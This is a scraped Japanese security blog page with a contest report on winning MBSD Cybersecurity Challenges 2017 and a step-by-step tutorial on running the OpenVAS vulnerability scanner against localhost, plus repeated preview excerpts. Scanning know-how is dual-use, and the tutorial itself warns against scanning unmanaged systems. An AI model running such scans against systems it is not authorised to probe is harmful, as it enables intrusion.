JSのprototypeとは、主に継承のために利用され、関数のprototypeプロパティにメソッドやプロパティを追加して、それらのメソッドとプロパティをその関数のインスタンス…

MBSD Cybersecurity Challenges 2017で優勝した

![公式ロゴ](img/win-the-1st-in-mbsd-cybersecurity-challenges-2017/mbsd_cybersecurity_challenges_2017_logo.jpg)

先日、[MBSD Cybersecurity Challenges 2017](http://setten.sgec.or.jp/cooperation/049.html)というコンテストで優勝しました。  
その時のことを色々と書きます。

## 1. 大会の概要

コンテストの概要を説明しておきます。  
詳細は[こちら](http://setten.sgec.or.jp/cooperation/049.html)まで。

- 設定
  - ある会社が運営するオンラインバンキングシステムにセキュリティ上の問題が発生
  - 参加者は、このセキュリティ上の問題を調査するチーム
- コンテストの目的
  - セキュリティへの興味喚起
  - 現実的な問題へのチャレンジ機会創出
- 競技の概要
  - 1チーム4名のチーム戦
  - オンラインWebサービスのシステム(Linux VM)とWebアプリケーションのソースコード(PHP)が配布
  - 配布されたシステムに潜む脆弱性を調査
  - 調査内容と検出した脆弱性のレポートを作成し提出
  - 提出したレポートによる1次審査で上位10チームで最終審査
  - 上位10チームは、最終審査会でプレゼンを実施
  - レポート内容とプレゼンで審査の総合点を算出
- 審査観点
  - 発見した脆弱性の種類と数
  - 脆弱性の再現方法や対策案
  - 脆弱性の再現
  - 脆弱性発見の工夫
- 大会期間
  - チームエントリー受付
    - 2017年10月10日(火)～11月14日(火)
  - 課題配布
    - 2017年10月16日(月)～11月14日(火)
  - レポート提出期限
    - 2017年11月14日(火)
  - 一次審査結果発表
    - 2017年11月28日(火)
  - 最終審査会
    - 2017年12月13日(水)

大体こんな感じ。

## 2. 予選(一次審査)のこと

予選では、約一ヶ月の間、ひたすらシステムを攻撃し診断を行いました。  
私達のチームは、幾つかの役割に分担して診断を行いました。  
筆者は、診断ツールを用いたネットワーク診断・ミドルウェア等のパッケージの診断などを行いました。  
最終的には79件の脆弱性を報告し、レポートの枚数は109枚になりました。

### 工夫した点

工夫した点は、以下の通りです。

- CVSSv3やCWEなどを用いることによる定量的な評価
- 潜在的な脆弱性の報告
- PHPは気合で読む
- 楽しむ

レポート作成が思っていたより大変でした。  
中でも、想定される被害や影響や対策を考えるのが特に大変でした。

## 3. 本戦(最終審査)のこと

最終審査は、先輩が後進育成などの意味でも、スライド作成から発表までを1年生に任せてくれました。
とても良い経験ができたと思っています。
筆者はチームの中に2人いる1年生でも、暇な方だったので、この件ではよく働こうと頑張りました。  

一次審査の結果が発表されたのは、11月28日でしたが、私達のチームは予選は突破すると信じて、予選のレポートを提出してからすぐに本戦のプレゼンの準備に取り掛かりました。  
おかげで本番まで約1ヶ月をプレゼンの準備に充てられました。  

私達のチームは、発表では他のチームと差別化したいという考えがあり、「実装などの技術的な問題よりも、もっと上流の設計の話とかをする。」という方針が初めから決まっていました。  
しかし、そういった上流のことを勉強をしながら作っていたので、早くに取り掛かったにも関わらず、プレゼン用の資料が完成したのは本番の前日でした。  

設計などのことは、先輩が色々教えてくれて、とても勉強になりました。  
最後の方は、自分でも面白い資料を発見したりして、追い込まれながらも、とても楽しく取り組んでいました。  
今回の発表の準備を通して、技術的なことと同じぐらい設計などの勉強もしたいなと思いました。  

発表当日は、自分の出番が近づくにつれて緊張しましたが、宇宙のことを考えてみたところ、かなり緊張がほぐれました。  
とはいえ緊張しており、終始 **"オタク特有の早口"** で発表してしまいました。  
それでも、前日に完成した割には、よくやったと思っています。

### 工夫した点

工夫した点は、以下の通りです。

- 発表の準備に早く取り掛かった(予選突破を信じて)
- 他のチームとの差別化を考えた内容の選定
- 緊張を和らげるために宇宙のことを考えた

準備を進めていく中で、勝ちたいという気持ちが強くなっていき、どんどん大変になっていきました。  
最終的には、発表点が(確か)1番良かったので、嬉しかった。

## 4. 発表したスライド

発表したスライドは[こちら](https://speakerdeck.com/8ayac/mbsd-cybersecurity-challenges-2017-zui-zhong-shen-cha-hui-ffa-biao-suraido)です。

## 5. 反省点

反省点は以下の通りです。

- 発見した脆弱性の精査が追いつかなかったこと
- どのように精査すべきなのかを知らなかったこと
- 検証が追いつかなかったこと
- レポートの進捗状況をチームで共有できなかったこと

最終審査会の後の講評でも、「網羅性が高いが、誤検知が多い」と言われてしまったので、来年の課題だと思います。

## 6. まとめ

情報セキュリティを極めるには多くの知識と技術が必要であることを学び、肌で感じることができました。

~賞品として、「Burp Suite Professional １年間ライセンス」「三井物産セキュアディレクションでのインターンシップ参加権」「MBSD Cybersecurity Challengesオリジナルステッカー(金)(完全にビックリマンチョコのシール)」「Kindle PaperWhite」「Amazon ギフト券5000円分」などがもらえた。嬉しかったです。(小並感)~

## 7. 感想

全体的に、とても勉強になったコンテストでした。  
色々と大変なこともありましたが、とても楽しく取り組むことができました。  
自身のセキュリティへの興味は以前より強まったことは間違いありません。

脆弱性の検討をつける手法や、実際に発見する方法など、診断の大まかな流れをなんとなく体験することができてよかったと思います。  
とは言え、筆者はセキュリティの仕事をしたことがないので、「現実的な問題へのチャレンジ機会創出」を目的にしているこのコンテストの課題が、どの程度現実的な問題なのかわかりませんでした。  
以前から、セキュリティ系のインターンに行ってみたいという気持ちはありましたが、今回のコンテストでそれがとても強くなりました。  

来年は、Webアプリの脆弱性についての勉強をもっと本格的にして行こうと思いました。(低レイヤーの勉強もやっていきたいので、どっちに重きを置くかは要検討)  
基礎的な学習も怠らず、手を動かしながら色々なことを学んでいこうと思います。  
そして、その勉強の成果を来年のこのコンテストでも発揮できるように頑張ります。  

今回のコンテストでは、先輩から色々なことを教えてもらいました。  
筆者も来年から入ってくる後輩に、色々なことを教えられるように情報セキュリティに対するアンテナを、もっと高く張らなければいけないなと感じました。  

個人的には **"圧倒的成長"** を得るために、このコンテストに参加したのですが、技術的な面以外でもまずまずの成長が得られたと思います。  
この先も無限に強くなりたいと思います。

## 余談

最近「[リーダブルコード](https://www.amazon.co.jp/%E3%83%AA%E3%83%BC%E3%83%80%E3%83%96%E3%83%AB%E3%82%B3%E3%83%BC%E3%83%89-%E2%80%95%E3%82%88%E3%82%8A%E8%89%AF%E3%81%84%E3%82%B3%E3%83%BC%E3%83%89%E3%82%92%E6%9B%B8%E3%81%8F%E3%81%9F%E3%82%81%E3%81%AE%E3%82%B7%E3%83%B3%E3%83%97%E3%83%AB%E3%81%A7%E5%AE%9F%E8%B7%B5%E7%9A%84%E3%81%AA%E3%83%86%E3%82%AF%E3%83%8B%E3%83%83%E3%82%AF-Theory-practice-Boswell/dp/4873115655)」読み始めました。


公式ロゴ

先日、MBSD Cybersecurity Challenges 2017というコンテストで優勝しました。
その時のことを色々と書きます。

1\. 大会の概要

コンテストの概要を説明しておきます。
詳細はこちらまで。

設定

ある会社が運営するオンラインバンキングシステムにセキュリティ上の問題が発生

参加者は、このセキュリティ上の問題を調査するチーム

コンテストの目的

セキュリティへの興味喚起

現実的な問題へのチャレンジ機会創出

競技の概要

1チーム4名のチーム戦

オンラインWebサービスのシステム(Linux VM)とWebアプリケーションのソースコード(PH…

Ubuntu16.04で脆弱性スキャナOpenVASを使った

今回は、OSSの脆弱スキャナであるOpenVASをUbuntu16.04LTSでいい感じに使えたので、まとめた。  
脆弱性スキャナという単語に対し、「ムズカシイ」というイメージを持っていたが、意外と簡単に使えて驚いた。  

> **OpenVASとは**
>
> > OpenVASとは、システムの脆弱性診断を行うためのソフトウェアです。
> > オープンソースソフトウェアとして公開されています。
> > そのため、OpenVASを使うと、脆弱性診断サービスなどを使わなくても、自分でシステムの脆弱性診断を行うことができます。
>
> 引用: <https://www.designet.co.jp/faq/term/?id=T3BlblZBUw> より

## 1.環境

使用する環境は、以下の通り。

```shell-session
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.3 LTS
Release:    16.04
Codename:   xenial

$ uname -r
4.8.0-36-generic
```

## 2.インストール

インストールは、[ここ](http://blog.amedama.jp/entry/2017/08/09/004706)を参考にした。  

以下のコマンドを上から順に実行していけば、インストールが完了する。  
まるごと貼り付けても動くが、心配であればひとつずつ実行していくと良いだろう。  

**(注意) tcpの873ポートで通信ができるようにしておくこと。[^1]**

```sh
# 必要なリポジトリを追加する
yes | sudo add-apt-repository ppa:mrazavi/openvas

# リポジトリの状態を更新する
sudo apt-get update

# oepnvas9をインストールする
sudo apt -y install openvas9
```

インストール中に、下の画像のような画面が出てきた場合は、「Yes」と答える。

![インストール中の画面](img/try-openvas-in-ubuntu16_04/installing.png)  

次に、脆弱性のテスト時に使用するデータを更新する。  
この処理は、30分～1時間ほど時間がかかる。

```sh
sudo apt -y install sqlite3
sudo greenbone-nvt-sync
sudo greenbone-scapdata-sync
sudo greenbone-certdata-sync 
```

## 3.実際に脆弱性スキャンしてみる

インストールが完了したら、実際に脆弱性スキャンをしてみる。  

### 1.事前準備

まずは、サービスを起動する。

```sh
sudo systemctl restart openvas-scanner
sudo systemctl restart openvas-manager
```

次に、OpenVASのデーモンの設定を初期化しておく。

```sh
sudo openvasmd --rebuild --progress
```

### 2.WebUIにアクセスする

事前準備が完了したら、localhostの4000番ポートでWebUIが利用できるようになる。  
実際に利用するには、任意のブラウザで「<https://localhost:4000>」にアクセスする。  
今回は、Firefoxを利用する。  

実際にアクセスすると、下の画像のように、安全な接続ではないという旨の画面が出てくることがある。  
その場合、次の手順で進む。  
(出てこない場合は、次の手順は飛ばして良い。)  

!['Your connection is not secure'と表示されている](img/try-openvas-in-ubuntu16_04/access_the_web_ui_01.png)

①「Advanced」の箇所をクリック  

!['Your connection is not secure'と表示されている](img/try-openvas-in-ubuntu16_04/access_the_web_ui_02.png)

②「Add Exception...」の箇所をクリック  

!['Your connection is not secure'と表示されている](img/try-openvas-in-ubuntu16_04/access_the_web_ui_03.png)

③「Confirm Security Option」の箇所をクリック

![Add Security Exceptionのダイアログが出現している](img/try-openvas-in-ubuntu16_04/access_the_web_ui_04.png)

すると、ログイン画面が出てくるので、デフォルトのIDとパスワードでログインする。  
デフォルトのIDとパスワードは、それぞれ`admin`。[^2]

![ログインページ](img/try-openvas-in-ubuntu16_04/login_page.png)  

ログインすると、このような画面になる。

![トップページ](img/try-openvas-in-ubuntu16_04/toppage.png)

### 3.脆弱性スキャンを実行する

WebUIにアクセスすることができ、ログインが済んだら、実際に脆弱性スキャンを実行する。  

> [注意]  
> **脆弱性スキャンは、自身の管理下にないコンピュータやネットワークに対して、決して実行しないこと。実行した場合には、罪に問われる可能性もある。**

今回は、自身(localhost)に対してスキャンを実行する。  
手順は以下の通り。  

①上のメニューから`Scans`を選び、その中の`Tasks`をクリックする。

![Scans > Tasks](img/try-openvas-in-ubuntu16_04/execute_scanning_step_01.png)

②以下のような画面が出てきたら、10秒間待つか、ダイアログの[x]を押して閉じてしまう。  
出てこなければ、この手順は飛ばす。  

![Scans > Tasks](img/try-openvas-in-ubuntu16_04/execute_scanning_step_02.png)

③左上の方の紫色のボタンを押し、`Task Wizard`をクリックする。[^3]  
紫のボタンの位置はは少しわかりづらいので、画像を参考にすると良い。  

![Scans > Tasks](img/try-openvas-in-ubuntu16_04/execute_scanning_step_03_01.png)

![Task Wizardボタン](img/try-openvas-in-ubuntu16_04/execute_scanning_step_03_02.png)

⑤すると、下の画像のような画面が出てくるので、`IP address or hostname`のフォームに`localhost`または`127.0.0.1`と入力する。  
入力したら、`Start Scan`をクリックすることで脆弱性スキャンが実行される。  

![対象ホストを設定するためのダイアログ](img/try-openvas-in-ubuntu16_04/execute_scanning_step_05.png)

⑥下の画像のような画面になるので、`Status`の欄が`Done`になるまで待つ。  
`Done`になったらスキャン終了。  

![StatusがRequestedになっている様子](img/try-openvas-in-ubuntu16_04/execute_scanning_step_06.png)

## 4.スキャン結果を確認する

脆弱性のスキャンが終わったので、その結果を確認する。  
手順は、以下の通り。  

①上のメニューから`Scans`を選び、その中の`Reports`をクリックする。  

![Scans > Tasks](img/try-openvas-in-ubuntu16_04/check_the_result_step_01.png)

②下の画像のような画面になるので先ほどスキャンした日付のものを選択する。  

![Scans > Reports](img/try-openvas-in-ubuntu16_04/check_the_result_step_02.png)

以上の手順で、下の画像のようにスキャンの結果のレポートが閲覧できる。

![Scans > Reports > Results](img/try-openvas-in-ubuntu16_04/result_page.png)

また、スキャン結果は分類されており、その各項目別の閲覧ができる。  

レーダーのようなマークの横にある小さな▼にカーソルを合わせると、分類されたスキャン結果の各項目が選択できる。  
例によって、少しわかりづらいので図示する。

![▼の場所を図示した画像](img/try-openvas-in-ubuntu16_04/sort_the_results_01.png)

各項目を選択することで、その項目のスキャン結果が閲覧できる。

![スキャン結果の項目](img/try-openvas-in-ubuntu16_04/sort_the_results_02.png)

## 5.スキャン結果をエクスポートする

スキャン結果は、htmlやpdf等の様々なファイル形式でエクスポートすることができる。  
今回は全体のスキャン結果をHTML形式でエクスポートする。  

手順は以下の通り。

①まずは、レーダーのようなマークの横にある小さな▼にカーソルを合わせ、`Report: Summary and Download`を選択する。

![ドロップダウンメニューが出てきている画面](img/try-openvas-in-ubuntu16_04/export_the_result_step_01.png)

②次に`Full report`の行にあるプルダウン形式のメニューでエクスポートしたいファイル形式を選択する。  

![ファイル形式がドロップメニューで表示されている様子](img/try-openvas-in-ubuntu16_04/export_the_result_step_02.png)

③そして、プルダウン式のメニューの横にある緑色の[↓]ボタンをクリックする。これにより、指定したファイル形式でスキャン結果がエクスポートされる。  

![画面上の緑色の矢印のボタンが矢印で指されている](img/try-openvas-in-ubuntu16_04/export_the_result_step_03.png)

④この後は、普段何かをダウンロードするときと同じように`Save File`を選択し`OK`と進めば、エクスポートされたスキャン結果をダウンロードすることができる。  

![画面の処理方法を選択させるダイアログ](img/try-openvas-in-ubuntu16_04/export_the_result_step_04.png)

今回はHTML形式でエクスポートしたものをダウンロードしているので、ダウンロードしてきたファイルを任意のブラウザで開けば、実際のスキャン結果が確認できる。  

## 6.まとめ(感想)

実際に脆弱性をスキャンしてみると、いくつかの脆弱性が見つかった。  
スキャン結果には、攻撃者がその脆弱性を利用すると、どのようなことができてしまうのかということや、それに対する解決策などが書かれていた。  

スキャン結果に、一通り目を通してみたが、おそらくメジャーであろう脆弱性についても自分では発見することはできないなと感じた。  
Webの脆弱性について(もちろんそれ以外の分野も)、まだまだ基礎の勉強が足りてないなと痛感した。  

今回はUbuntu16.04でOpenVASを使ったが、どうやらKali Linuxには最初からインストールされているようで、Ubuntuを使うよりもっと簡単に使えそう。  
今回Ubuntuを使ったのは、普段使い慣れたOSだからだ、「Kaliでやれよ」という声は/dev/nullに捨てることにしている。  

他の脆弱性スキャナでは、Nessusなども一応使うことができたが、Vulsは環境構築でハマってしまっている。  

がんばる

## 参考ページ

- <http://blog.amedama.jp/entry/2017/08/09/004706>
- <https://www.designet.co.jp/faq/term/?id=T3BlblZBUw>  
- <http://olivermarshall.net/how-to-install-openvas-9-on-ubuntu-16>  
- <https://www.itseclab.jp/security_info/security_intro/openvas_verification>

## 注釈

[^1]: インストールの過程で、脆弱性をテストするための情報を更新する。その処理のために、rsyncプロトコルを使用するため。
[^2]: 変更する際は、`sudo openvasmd --user=admin --new-password=admin_new_password`をターミナルで実行する。
[^3]: ここで「Advanced Task Wizard」を選ぶと、より詳細な脆弱性スキャンができる


今回は、OSSの脆弱スキャナであるOpenVASをUbuntu16.04LTSでいい感じに使えたので、まとめた。
脆弱性スキャナという単語に対し、「ムズカシイ」というイメージを持っていたが、意外と簡単に使えて驚いた。

OpenVASとは

OpenVASとは、システムの脆弱性診断を行うためのソフトウェアです。
オープンソースソフトウェアとして公開されています。
そのため、OpenVASを使うと、脆弱性診断サービスなどを使わなくても、自分でシステムの脆弱性診断を行うことができます。

引用: https://www.designet.co.jp/faq/term/?id=T3BlblZBUw …

Articles